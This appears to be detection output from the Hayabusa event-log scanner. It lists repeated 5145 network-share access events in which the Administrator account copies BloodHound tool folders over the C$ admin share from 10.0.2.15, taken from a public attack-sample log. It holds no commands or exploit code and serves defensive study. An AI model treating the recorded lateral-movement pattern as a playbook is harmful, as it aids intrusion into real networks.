10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.668 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.668 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.668 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.678 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\lib\alg : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.678 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: 
\\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\lib\data : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.678 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\node_modules : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.678 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\node_modules\lodash : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.688 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\hyphenate-style-name : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.688 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\hyphenate-style-name\.nyc_output : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.688 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\image-size : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.688 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\image-size\bin : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.698 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\image-size\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.698 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\image-size\lib\types : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.698 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\image-type : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.698 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\imurmurhash : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.708 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inflight : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.708 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inherits : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 
+2019-03-18 23:23:24.708 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.708 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.718 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.718 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer\lib\plugins : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.718 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: 
Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer\lib\static : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.718 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer\lib\utils : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.728 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\invariant : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.728 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\isarray : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.728 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\is-obj : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.738 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\is-zip-file : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.738 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.738 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.738 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\external : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.748 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\external\sizzle : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.748 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.748 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\ajax : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.748 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\attributes : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.758 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\core : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.758 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\css : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.758 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\data : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.758 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\deferred : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.768 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator 
: Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\effects : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.768 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\event : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.768 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\exports : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.768 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\manipulation : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.768 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\queue : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.778 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\traversing : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.778 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\var : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.778 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\js-tokens : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.778 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jszip : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.778 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\keycode : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.788 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\keycode\examples : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.788 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\keycode\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.788 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.788 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.798 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\dist\plugins : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.808 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.808 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.gexf : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.808 +09:00,PC01.example.corp,5145,informational,Network Share 
File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.graphml : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.818 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.image : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.818 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.json : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.818 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.spreadsheet : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.818 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: 
\\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.svg : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.818 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.xlsx : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.828 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share 